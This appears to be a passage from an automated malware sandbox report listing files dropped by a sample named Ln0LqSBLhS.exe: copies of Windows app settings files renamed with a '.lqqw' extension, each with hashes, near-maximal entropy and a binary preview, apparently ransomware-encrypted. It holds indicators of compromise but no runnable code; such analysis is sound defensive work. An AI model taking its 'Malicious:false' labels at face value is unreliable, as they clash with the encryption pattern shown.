                                                                                                                                                                                                    Preview: .o...>..UN...h....eQ.K.b....#>#9Gy.*.....o.X.lJ.V......T....e_}|.....Mc.j(#.u.....d[M7-Ld.S.c...?w.._..c.]....A.(.\.Q.D...|..xA.vV.t.0......b8.kN*T.h1......L..J."VT..*be...|n?..........[..dn.x.I. ./.,.n.....)M.o{[..R>....r..L...x.......z*kqN......6L.yO.z)T.....nIHBt..[`...r..'.m......Xn...r...BF....Z....-.....L.L..O......5..&...h.=&.M..s....E<\...c../+t+...@&...A......T..z.|..-.e.....x..H3..0f6-..p...[.48sT.[......{....V.!N.....k.i"..].l..Z.az2.....9.P.!"D..~E....Vf..v.].......]os..R.P..;.=.bf2..kV&....%......1..eGE.}..Pj.....&3.P.H...>......Z..X.(..H...t....\I..%.x@..Y?4.32*_..G.~P@....Ud,Y..D..q.^O.(.?.u;......._<8.......:.py.(.8w.q..8c... .....)...a...B...CS../.S..t....uJ......5.n...p..=.NX]..~.-..D.......p.>`.K.Sq..L....\..K.;...E..K..O.Q..K..0|..H....8...w.7.TP.T..dzo.+..ZJ..N>J.(.......}oJ....5.#?....u..K..yz........o)...}...<...4j..!"..X.....b.p..../.wd._..2.4.:.S\..*..H'....0j(B..+W...0.T...Pp...g..._Fs'.iY_.jK..7d<...F......W.p.%.....e
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976904936760552
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:/JVg6LHbNtb9fyldsZEs2Ojj716w0TQ5imCvvekgWxRWKUu:/7Lzb9fIs2M7igY3LWKUu
                                                                                                                                                                                                    MD5:CA122FDD26485E9F0FF74A0FEC033E79
                                                                                                                                                                                                    SHA1:098AF527B7C13FC9ED79504BEE320EE3CC34A78C
                                                                                                                                                                                                    SHA-256:77CF971EC06A7E794F0EE77AD30E95A4FEFC04C8E60E2E9189D51CAB30513DC1
                                                                                                                                                                                                    SHA-512:4D82854754FCBDDB8DE5DBC8E3FC0F1D6A795A789843E7F86C2C6AC8219CB0F2672FCB0653445FE9DCD7E231D773C48B73E09A6455B20B067340E6E400E286D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .(...@....H....B..6..s.d...8]......jX,@7W!k#..N....U+G......9.p./V^c=..d......#a..v...;..L..}...i.a$"..S....P.:....[J..&..E/.7...~......../M$.z.e..2..0-%.C..+...G...=,C......././.!....B9e..Jac.".>Y......n.......0....k.l.pe[3....... ...$F>.{.yK`[........]y....X..K.h..3j.Z.b...dl.3........w..j.5.3.H.t0.h4m.xU.*].jU!.=-Mi.........N..(.h.=!<.5...F...P..7d......^X..4Y./...Y.qc....(.S..EYaRE&x&.l..v..|"<...=...b.....w..-8kA.U.A..Mw...}..nTv.'..'..M..f..O.^.'.Y.).....e.e..........-.VNg...OO.....[....z:..(2]?....l.......g....J.,3.T.B*...7j}.}v.t7k....B......C....`.;NmU....fO. .....}..=.)....-...,~. 2W.T.}v.....mw.W6.U...+qs.@5l.......)1..ty...L..=~v.4.P ..\...J.2{..y.!.........A.'.na.....X3........(. z./...M...ZI......v\.c.f.R..y-&..;......_...K572.m(....cw...I.H.jZR.w....D.Z..A....2..T.>#...W.#,.........:....M.$/.%..W."..._i......n...7..&.2.r&M.&.0...AA,.9.}..7..Y.~[.AG.9}<G..0.?...`..J....)?.T,.0..A.&.g}.!.......e......zl{.$.{.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977102610771324
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:0MgEgLd87fFsf1d+mNzLRY9kew1HZp644HZfxkj3a/n:0h87if1gmNzLRY9kHa445Jkj3an
                                                                                                                                                                                                    MD5:F49BF70AFCE3AE4897FE3F90849859D8
                                                                                                                                                                                                    SHA1:D503ECE0841DEC97D17028CD4145155D70CA3B97
                                                                                                                                                                                                    SHA-256:4239A85A203329026BC7D3030AA7037A0C68BE94C4EA5B4518B5697D357955DC
                                                                                                                                                                                                    SHA-512:0A1CFE0715CD88244A81BAECB42638818798A0B1670E9FADD93605E3171795CE66DD6F81ADD271AD4A85744A062CAAC4E042681EEAA3704B22CCC5CD512AC417
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....{.b.1.c..4...YA'.W..+.....'.].)`...&...f..E........?..N.hy.:...`}~.w~\..IL`.....ad...|a...T..x...R.......v...%b|w....t|M*.qAMW.s..rA..........-.7E..!...VJ.. .....).=.o....(8]D$.(...3.^)....2b......h"....jp8...4...E......BNd....[3q.{.7F..d.-...>=..N.'5.a..h............%nIW-\...]..Dx...;..fv.9.pn..])5z.@^Y(\...a'A]...5S'.7.xg....=/......H^Q}.'..p..%....5\...=!..m&....."..U...14....:r..Yh~..y.".../..R.]!.{.>d..!v5(.tW..c...J...L........[d......tp..E....~.G...!.K.JS."hS<.v..t...?(...P..k=..+.....^x...'..e.)...\.L..Sm.\8.(.+:.px,...`......Y..oPq.F..-...#.m.B\....9]Ym.e..-.Z...z.m....=E....L.c1...e...~.Z....p.<S..@...-..#..k...p.g~....#....k%..C...H...}.r.h.;..X5....H$....x.56:d.......tH/?...VF....A.1W...V.K...C....N[@.p...A.oP-a..\6.|..Z0....F..c.....#..:tu.B.8..5.3I%.!.^.G....Sln..8A.!~...rYF.l1.J.....-=J....C..<..!D...m.R....M..3...R..M.l..E.%...uTF....V%..1Y...=.... ....D.n0."....Tb..<`(.=...'o..s.#Sop.f.=C.F!v<._......V....A..I.H.k8...."Y
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9798600511842075
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dsnNpXjYJZ9IQqYjVi1EJRKiqjjerG2TIPRtuLgdyLg/ohfy0eF:gN9YJZ9IQjjVi1EJ1qPeJIPbjAIAVeF
                                                                                                                                                                                                    MD5:618B16F2D204C320F1C1C6D81EFD89FF
                                                                                                                                                                                                    SHA1:1C025B22ED69A514B1C5744B26C0C3284D791580
                                                                                                                                                                                                    SHA-256:176538178877A11583FF55E3D8EB88B2DCB875E3C94A433657978B87252B66E8
                                                                                                                                                                                                    SHA-512:2F4DC2FC6CEB922C8BAA5311C13210F896C1BBD87F371465C2771ACD74849B79FBEB0B36B3026B1966C8179AA1DAE6E203863F96FB5C993A4176B08D9CA0347A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...,Y.~\...f.1(.r.>..~.b.P.r....YP....%....;.L$.G.}Z..?yo9.n...6..br..p.u......so.f..u..._"....*.+....N....n+..'...."._>..B.|3Mu...l..........H.#0"....u'..5.e.]z.A.C.jtH...n.....#9...J.I..`9p...$.C...3.SFM\.w.....I..<.9..q..\d.(...j.e.ET..J....&....{..)||~....;\.:..[......d..!.....'....C...U.X.....c.7Z..Acd..:.U.l...{.Z.y.2...+..G......t.a.........K..|.H..=...?P...\_.s..Y.)Sb.`....9[`So..&.C....h...x.p...b.6.......lA.|..iL........r..."<.:+`.e,E.b....i.H...[...=z.m...<..%UTs.!.......z$~(|.=D&..;..q..k....H.p6>z..6>....E)N. ...e.:?@....$.....9V..df~....$.[..`...3...3..sq.L'y...{..TG.R...}8..$S.C.B..j6.0...J\......(..P...MV<Q....#...9.j.?..bd....(../uM.Qs..,.U.K}.2...=..u.l..&.6.l.V<......E...Cu.....mh....E.....HF.....\).D......=.._....y.Q.F..2.+.._D3....Z<*eF_P..].uc*...}..E...Y1G(.i.w....<..........w=Z.Yo...c5.....^H"..v.;......>X..{.l..{0......<!,........Dm...6.|OJ#.......M}...m.w.h3k...6....#.W..........|.x...b[}=..p...DJ...".*..9t.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977500917793708
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RmUu4XBTMX3rpeC5zgOKTOC4umND5rTkccys2k4ZEkmDUOamSvbEzrQCR:RmM6X1UF6QmjnkMVk4ZEkmR/MO
                                                                                                                                                                                                    MD5:414DEB4FC99C81AED9DE5E3E595DFDD2
                                                                                                                                                                                                    SHA1:4315EC1688F1C3160E7051E838FD252A5991C27C
                                                                                                                                                                                                    SHA-256:C9D279C53138CA04FC5474EB6F6FD65B71CECDA5DA60945F476615D98ACB163F
                                                                                                                                                                                                    SHA-512:5021B579570314F1CC5A6EF33D5FBDEAA60230EBDD4EFA4EC8867B95938C3F37DCA2B401106168F8BAAEAE45E78315933E2ACA44CC5C0CBA7356860DAC79257D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....0!J.C.i...R .5.FO/...;....p.VJ0SS`B..R....`..`j...[(.9W.S....}........%.S..w....G/E..Z{.=...7x...3....+......N{lPz..O4,...e$...?LID:...e..u.....bO)..R'*..`..w.!.j......[9.|Vx..Ysy.w.o.....|.]DN.M....v..e..\Z../...CZ.,....*..M....F,fzR.....:i...7..`.V..?.....j./....Te.........i...*wj..D...v/S..._....X..K...V.x.U.....2."...-.....OF2...lh..#.S.T...`.s.N..|k.S.....v'...%..,..r..'..H.&..%>.fE$.....nq.4.H.........;.>3.q..Yk2.av.P...Kb......e._@.b....Q{..sE.F..........5....T..70T..0.H...|n......j..Gh./.......=.?...e.....4Wwh..yv.......zN.\'K..#V...:._tqp......4%.....E.I...*..8..;..:....B...m...-a..lU.!.t...t.....s...4X.I.......e..e..W..X.L.%GZP|..*..D... .m..?P.i..6....^.........7n...I..w.a:.....-. ..!....M.s.:z,Z4.[..;.+s..L..N...Qo}o....ey. 9..':..p.8..+.?..a.6..B...vf....%.....S]...&....3O..{=..gt5.p..f..5.....+cD......\..._.....J....p..t...|Yo.cL.e...9+vG...D...&.H|...m...0.B..x....@...a..X.L!.."{$.L}....'.&.....@e.h.....B...ZV.xe.6.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.973490875208565
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:07Oep2md8Cx/wpR1ELGXc9SRdUHU9INIspB2a6eY3Tk:0qcpER1ELcW09INIsH233Y
                                                                                                                                                                                                    MD5:5142A9629E3D27ECE571A37649E6D52C
                                                                                                                                                                                                    SHA1:DF9D2458EAA11A4F5A35F797BCD2906D259FE2F1
                                                                                                                                                                                                    SHA-256:2B6178A4372E285EC02EF3CC3A72E6FBD704EFEEC703CA36F7D20E9AAE017375
                                                                                                                                                                                                    SHA-512:53B31830F20AB6CE750C5C4588DAA7B56486227855B001D55FBDBBAF505061B0E58FE12C1EFC5B9AB9216D24C693FF386C6FB39AE3CD7FC700FFB8B2260AD618
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .U...?.|.*.$.......,.....h...D..c.z.^..}.F.B...g%..b.............ffe...Nf.V..H..f.0}.[..6.(.x.C.Xx.5.5avM-.'........,....qwf.`R.+......<2+O..=.w(..I_?...H.%-....Q.=..M.G.0.@..C....K...E9$. .@.."._.+I..J.w...r.r.-.....e...t..p...p..0.]|M..q.O.W.,As.u.H|....Zz..&N...!.XH+..i...Tt.;.,?Q.?.;+5.-.L.M....9.P.s.....~zh]\.v6xT=.=..H.8tU....$..kGZ....C..E].%...R.pa...,...........O;}......'....O..Q.E...:+.k..d(...!.|..5....PXV8t*A|..n...'T..h.W.......a.......v..]..X.y.XP:./.1.Y.=zp.|.t....D.....V...NF'p.Fi._....&q......E...y.'R[fa?e._e.=l......1.s#.....u...+.....B...0X.Vt...[.).8?..f..S......<...t.....1.M..]...<DD.?.....w0s#s+.f.....uR......B.....{?.L3Lv.....4...O2..y1...+.z..d.q...._...../T)3?W,'v.`.LB.l.$.&:R...{.......+./ .Kt.,..$.?.C.N...Z}.Ec...w.[L&u..?.T,..3b..v..T...Y....7....X.C..RG,......._..p...J.}Nsr..z.......(...-.r..f16.9`.D._.'DD2.0..;..By....+Z.. ...3......{'...../0>.M.B.c.M..lr.........8........t..W.....gJy.*.(p..P..._... .)..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9768655086084985
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UI1S4vQEFKcgqaskaVwdGQ5rzeqYxB3PTt0bxMBWmhmsRgagA7Rr/f:UooEFBgqasxVwdtraZ3Pp0baBlAsRx1z
                                                                                                                                                                                                    MD5:3C5F3982B3FAEB3FC3B2267C2F036386
                                                                                                                                                                                                    SHA1:60FBE25183B5562F8997CA886181779350331B85
                                                                                                                                                                                                    SHA-256:C906117CA84574211847288C8B20139420B1F3EA7A589CA0DC9EA4DADA487AAF
                                                                                                                                                                                                    SHA-512:6276C3FE9FC0F9BB4F44C56ABA129A0E4F727D79791A991090B20EDEEA0BAA7B88EC9A056DCA94051EE075731B9BABA342B45001725C6F93FE624F809839D050
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: m.}S......O.>!....(a!.g5...~2..A.9.1...v.0..o;.O........J..+.r....V.)..M.)..b-.....0G..k. P..]...wWZ..$.1.<..r...i...7.U#M.-.~e..(..E^..../c<..+.g..S...o.A(@..3B...KwZ.@..D..........:.S..r.>.-...j..F#].y%.kj.B.:o..T....W.L....A1]g.B/.X ._....c...X?.+..k0n.+.. ^.~..&..H\.Nw.WWuVHh..D.(.2....I@..............@....Yc.v.....W#KC9.[.i.X?...wxz..@......Y.....p..Q.g0o#Vw..1....A;Jv.z.......-....$....8..x..`.~;{Z.>d.be.{...>.w....G.z.)....+8...>.u..l.9b...X3.A.q.1;...d....X......cW....e..s)...tK....i.gk.iF..R_.._.Y...8.....g..]5..7..G..M...q_S.s<..&...M..K.c...y.e.R.,.<%...-.m71q..*(.h..:U....f..9..P.aD6$LT1.[.Tg...9...{...........u.A>.C..5L.6.5.#~ @..[.._.lF.N....g.~......,..L*...p..U.{XT.(..VI.....C;t....-b../5w<..c..`.2.B.Q..F.......u.S.PpL.E.w..Z6..e...)@..)...+....|.h...<y^u. &....X(._..K.-...}..-........V.]..Y...'.W.l..+.B..%.2..v..............X..O....O...!r.xU4e....X!..0W.....!D.2....3.*~...@Y....._B.0..l...>7.b.hA.......;.F._..SL.j..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977025137603275
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:3yCQdf2mRzhAs2QOnY1rZFOrqmFS1S+1iXNjYS0wfWZCpYcK7:CDf2YM4lzOrYjgXNjYSp3YcK7
                                                                                                                                                                                                    MD5:A3AE3B65A888B3A9E7690245BCEC6518
                                                                                                                                                                                                    SHA1:548A2C1BEB03968CC1FAC2D0CC37F7EB7CAE3341
                                                                                                                                                                                                    SHA-256:332922DB585536C085BA3C00773172FE8EBAA110519A7F3B096430FAA884252F
                                                                                                                                                                                                    SHA-512:401FD0403EB40ED332F37716F625577CE799A894DAC5790B7BC067076F18B8142BC0CAF6DB965FB3E53354CF6F2BA576B10425879F93AE28742EB7A8625ADDAC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ./-P3..........k......u...<....(.5.A1....j..2Q.>36c=....A-......3*..R.....A..q.6v....w`h.y].tI...<.e.....B}J..N..n.(D./8.. ".a.m.j....e.s..jW8U|..x%..l1:K...P.S.. A.3.x...^.V...."..+\..-S6.....J.$...}..o,(p..-aE......SH-=Jz...t.'.<..gE.s..P6!...-...._....sZ....9.....'......O..Yt.&.X..Q...f..n.aW..@gZ`..ehlw...R..o~9..w..?S.^{..n.v,.?x.....v..U.....Sl.Z.(.]@.M.|o....X*.~X6b..7.w0.;..>.W..J.....-..*...v......L.Q..Q*.?d..z~....E..*.|.>....7E M......apK<...v.9....)....a5.-hN..y?L|.......](h..#...EJ.;K.PS.V.....Ve.....^..1...b*..{F..^.?*[.P].23....0/H........6..m..'g...Q.?.U...F&_..sB.=i`Hb....^T-X.~s..^.^Z.l9I..6.H..r...W.b*...NH.t.v.-..e.[.hwM..b.$."..K..8q*1./... O..?........N.@2"j..|M.X..z....$.qXq.:DAp.N2.-...`..ne....T.T.RI~.v@.u(.....<.......c../LR-..$.;....b.2.7qL>...{;XA[..r."K..tY8..Of.8......d..ku..S..g.iB.&|.=%..4..Km.'|.]...++f.3....sz......C.)B.d3.......v..6...q.$\....p..5......cp....M.\..I...P..t@...r..U]C.kB.J.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9797895555939995
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EdvepEt0auldqmPybAwn6QTrTvigdwsP4IAmKcja2rBB:EdvDSauldqeNK66qgdJScfNB
                                                                                                                                                                                                    MD5:1EB58CCA1644EAFE938A688474AD8F29
                                                                                                                                                                                                    SHA1:5F66DE6DF9D8C4308748D6C591A63C87DCB7B8A4
                                                                                                                                                                                                    SHA-256:AAB9FBABA56B156A4D5BF3DE1D57052428DACF6383913A3372FD1FF567EA3D03
                                                                                                                                                                                                    SHA-512:F6A91C69F93E35F083619A31C2996F09074A652D815B8C730E16FD700D09EECE805F189D09606D4569A53BF426FBD601CCE7F1F77C5F86E1E869BE9E35E21C8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...=.9.!.......8v..!..rGI.l......IU...../.........IGO..~Z9.@...:..k..LJ.F.m8..^..VT..S|.......[.[....Z...a.(K~T."YKj.K.?..)...F..E/.e......3..>KR.m".....i[...MF.....8F.*C...../,o..sVH#...o..Ff..c+....7T.F>...s5......GE.R=.T'&7..0.]....l.A.@b........c.vz`.u^.L...."S...v.T...=F#.'.5.....E.-.%....w....L...g.....9..+..R..`,3..H...1_.(....y$.d./.y.%....uG..Z.4.<:sr..2.&6)O..^..@.....v.X.6..j....~. .c(.(Lf[..."A.L..:..j.o...^.j.U..../."..O...J#H.\......Yh......w=b.Z...H.b.lvC.8..=.-.O.Q&3....#.....1~.2*...."b]..Z..Zz....C..!..A....o..V....yMJ.*.NyW...Ds.3..k..c{....TT^..c.%r...Fn.x)...!..tvo.J.C.,....;.w\.qaX...4.).R......f.3.,...?/l..F\*..[.k.m.)..|..t....-.......$...c...w..q....lDJ.q.i.W8I .m...9.j.pWK...+.WY.m.V.y.8...;....X@.g....{...{..F.a.....2?...3... ..V...`...`..\.kNA.h5...%.............nIr..\.W......6.,c.....({.7$.....)>...+.4.k..z.F.JnJZA..G!.YM....b<g..0.j.b..s.6.^Ogz.G.... ..........^c..0.......!...?.r..dO(.K.......mtp{..(...K..xq.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974851124938357
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:e39E+3ghB/PA7lsnKstdEZNBHWSgoBIT2V7XxehLGLL5Ewt1:+m+A/PEIJTE3NDg+PLxflN1
                                                                                                                                                                                                    MD5:C41F1CD266FE85664387588AB1CBD44B
                                                                                                                                                                                                    SHA1:D928349C1788B1945F032418B90008CB6F1FACB5
                                                                                                                                                                                                    SHA-256:12CAFDE1E808673F6E4C7EDA0B0DA16CAE247DC6D129701924D7515451AC682F
                                                                                                                                                                                                    SHA-512:0F34D6E37290594F2AE85383A2B90EEE09422FDBD94AEA6387CEB4E8C1220A035483DF1CBE881FE20A1530A0A3741C810560039B623E446B1633DEE9CCD4F535
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: i...1>..>. >......ZF.s....Uz..5.k......sZ.*.$..3.$......e.Y..!f...`.3..BH.Q|U."....}.q......x..T9~2.}.=.vD.....$...M...Ca....#Q3..W.y...+.4....a9xl....I.f.....j.e.k......X...u......'......a...D.....4O.t.*..-N...Q.).!.8w...|H-....N{.a_.L.p..8.~../Y.v._vD.C....>.qtDS..4.B......NL#N.3.l.,.......6.m..nH....9p.T.dC.&.\...i.W..i...|K.dBnW.t.L.?.w.V3u......V.A....h3f...U.A.....n..F&p..Eg..L..TP$...tx..7........^.:...(.~g....i.....;..5...4 ..yp...I...i....C..)..wD,.@.|F....#..S..v.K.....c.Q..5.B.....4.:...O.l.R...k...,q.Iu3....mK%.....B._.b.....{9....W../...?f.......{S.h.......6..~....Y..<.g.].Q.....2.0.vz`.kY...S.3!.....L.9.. ...."..eZ..n...uTG............-.&a.l.O.A..UcI8U....h..@..hHJ.c.8......u..O..'....` .H..1}....P....\.C...,O.....6s..).-.=J.....K....l..-...*...R.D.Q*..=..?.O,4.....V.../0^.....S...,..).....M.h..l0....S....z.....C.....3C.......o.JJ..F.t....L..9...6..B...&..Sy.V..$......w..|.T. _.`.v....($ia".'.f.U.o........_..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977900966776996
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5GOxV4ls5wni7lP/RZwIo0ZfwNE1oBP10kY+6zgi4:5GF899/fnKV64
                                                                                                                                                                                                    MD5:D586FE040F3576354B95085B8CD15A87
                                                                                                                                                                                                    SHA1:B8754DD69AC4CD96E599C63A9AD6C143CFA37753
                                                                                                                                                                                                    SHA-256:3F18FE4601047DA3FF747B43C7C107DCF236B6DEC73862FF3FAAC3C6795D97B5
                                                                                                                                                                                                    SHA-512:A9EB9CFB24BADEB3006EF1936AB5E11EA468033288FA4121F00FBA76198F158F782C5A8EBADF0B8AFED84E8157BABD76205932B7F5DA2FF176CB74A72BA5940A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Zw.l.Q..BJs!9s...Z.....Q-A.<.^9.../65}..%.....|D"...y..g.TE}..6.BI....ZW....]Wt.j..H..X.m.T..Ehy..<...).....Y....0^.2M~..-..6.f.%T.. .z..R..J..Q....F.h.*\iyc...*.rx...L....P...2&...{...m...0.).....bs..4v..E9..`.{J....H*.F.+.,`.Z..<}s4..1.;..Q.q.}...h.5........P..o\{b. |.Y.&xHi9h.*$..bD4b......2.YB.E..../zGS84.4G....2.%....[G..TW...@.!.N0.(..#...W.....]..$:.z....aH...G.D.....!..Z".!....-..<@:.v.o....&WT...tt..2.9...........$I..$...Y4......|N..h<6..S.{.b..=..<...jb....JU.7....V"j.j...J..t..@]\.Skb..E....\....5..W.r...Fp....u....tj..[.H...k..eN#.a.k...vfS.F.a(5{L......ewGY.m..kr.IN.;..Kn..........O.}....Df.(.jSe..&K..v...9..[).g..s.!..#.[... m....4..#.......v....e....9..p.h.v.E........z..~-..r......PW..Q.....z.T....1+...2.....,.GW.9Y.u......k.7f.....M(LS4@8..g.~.V.m...HM..}.Z..(..#lt..1..Y/....H.R.....2..@...P...*..C.lA...!&...1.T....X..Z...........H.....E/&vyh.h!....0.+$'.t..[..}.F...kn.......b.@..!.L88.Gk..v..y....x...;.Q....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977455777783246
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EJfELlLQJhq5BKxMldufD9PWSbYlRD/6lenFxj5BPpRYA8Z:hlQHQBKCvDlRDylkxtB74Z
                                                                                                                                                                                                    MD5:2122DC4CEEED54BE1C8E31939164F094
                                                                                                                                                                                                    SHA1:7844BA4B8EC975F2D81D2602265ECF5DB241E369
                                                                                                                                                                                                    SHA-256:8A5CF44B1F95536C18147BCCFFAE80384A5935E0F35B5E734B9B4C7EB0BF3A9B
                                                                                                                                                                                                    SHA-512:5C9B3BF8FB6ACC8B00E61D10AF2ABDC357AD172D7D316CCBC9581FC0406F20C08B3E45DD71214E1A5022E6611B58DC9F4AD4C9606C71F9A7BE5C60B8B60681FF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...n...Xp<.....UO..$;..J.C;..g.........F..x......2..`.~..?.x.:.F......B.,..k.Y..B.\%..n"....a..We$.%y...4....f;...o....*!.nvsP.m..1S.Q.z_oE..D;G$H.1.{(...D.....<%v6....{.|z.-..IJ..A.G... ....^..W.>.R.....-......-..Y:...].|.:AC+.da..R"`..O......-2...r+..}S.....1.s'-..k.x....J.5....:[{........~Kb.,]%..o0.0.".....7....B....oC......GG...M.n{2..^..*..=.PH...u.."..2FY...)a.P..Dre..$,7v@X.p.C. ^i|.9[..o.../..8.pa!i!d..%.0.9.5{...ep.+L...?E3...!..._..;..D.....q?.z<A@..$0....s...NN<..FO.N........sN...K.{..w|..9b..J[Q$mV.1.._<.."..._.(..{..5v........I{..C.j...>..*lRb..3.<.K '.uE.7.G\I.+.l...7.(.,.t.-...x!&.f.y....g...k[\.....K.#...C_.|...)..M.W.t.....T...h...~. ....{5{...6...%...{$..<w..Vv....K........;.....,..W...D"...Y..3..X.dw.!........?.JT.9.^uiM%.gb4Q2.h..M...|>.gz...~..+A...{...?...7...9.+F..n..)..u.R...".L...S|.#I...+.6...Ni...v.......~}).O.n.*..d....y.....6.v.]-9.RWT\.$.4#...n.{pt.`.JcC.\..8Q....7..V.|..`.w.i...}{Q.}q.)n....b...B.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975794292027528
                                                                                                                                                                                                    Encrypted:false
